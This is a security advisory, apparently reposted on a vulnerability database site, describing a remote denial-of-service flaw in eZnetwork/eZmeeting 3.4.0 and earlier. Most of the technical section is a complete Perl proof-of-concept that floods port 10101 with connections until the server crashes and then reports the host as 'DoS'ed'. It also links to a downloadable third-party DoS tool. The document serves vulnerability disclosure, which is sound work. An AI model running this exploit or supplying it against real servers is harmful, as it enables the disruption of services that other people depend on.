`
Security Advisory
Vulnerability: Eznetwork multiple connections Denial of service
Packages : "eZ34.exe" and "eZphoto1.2.1.EXE"
+ eZ
+ eZphotoshare
+ eZmeeting
+ eZnetwork
+ eZshare
Software : www.eZmeeting.com
[version 3.4.0]
eZnet Modules:
SwServer: 1.153
SwEzModule.dll: 1.72
SwLoginModule.dll: 1.94
SwMetaObjectModule.dll: 1.46
SwProxyModule.dll: 1.35
SwShareModule.dll: 1.90
SwStatusModule.dll: 1.41
SwTransferModule.dll: 1.172
Version : 3.4.0 and prior
Vendor : eZnetwork
Vendor Url : http://www.ezmeeting.com/Products.html
Bug Type : Denial of service attack
Severity : Medium--->remote crash
Severity : medium
Author: dr_insane , [email protected]
#################################################
#################################################
1. Description
eZ:
---
"Imagine going to the movies, but instead of seeing the picture, someone had to
describe it to you verbally. That's what's happening in countless business
discussions and conference calls every day. A lot of time and money is being
wasted. That's why we created eZ. Now imagine having the ability to
place any document right in front of the person youre speaking with on the
phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online.
Real time. That's the power of eZ. Regardless of the distance that separates
your team, eZ delivers an amazingly interactive, simple, visual workspace for
all team players. If a picture paints a thousand words, think what an
interactive picture can do for your business. Picture it with eZ."
- Vendor's Description
eZnetwork:
----------
"eZnetwork is a service that works hand in hand with the eZ desktop application.
It allows users to connect with others (outside their Local Area Network) over
the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows
users to host conferences and join conferences, even when one or more
participants are located behind corporate firewalls, without compromising
security."
- Vendor's Description
eZphotoshare:
-------------
"eZphotoshare is an amazing new way to share Digital Photos over the Internet
with friends and family. Seeing is believing, download it today and
interactively share digital photos anytime, anywhere. It's FREE for home use."
- Vendor's Description
2. Vulnerability Details
The vulnerability is caused due to an error in the connection handling, which can be exploited to crash the
server by establishing about 600 connections to 10101 port.
By executing the following code against Ez.exe (port 10101) the server will crash:
-----------------------------------------------------------------
"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |
-----------------------------------------------------------------
#!/usr/bin/perl
use Strict;
use Socket;
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];
printf("================================================\n");
printf(" Eznetwork POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);
for ($i=1; $i<$stop; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $prot );
my $dest = sockaddr_in ($port, inet_aton($host));
connect($i, $dest);
}
CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("[*] Exploit Attempt Unsuccesful");
exit;
sub CheckServer($host, $i, $slep, $stop) {
($host, $i, $slep, $stop) = @_;
$blank = "\015\012" x 2;
$request = "GET / HTTP/1.0".$blank;
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Timeout => '10000',
Type => SOCK_STREAM,
);
print $remote $request;
unless ( <$remote> )
{
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
sleep($slep);
KillThreads($stop);
exit;
}
}
sub KillThreads($stop) {
$stop = @_;
printf("[*] Killing All active Connections");
for ($l=1; $l<$stop; $l++) {
shutdown($l,2)|| die("Couldn't Shut Down Socket");
$l++;
}
}
If you don't want to use this code you can download g0dzilla to test it:
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe
Workaround:
User another product
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation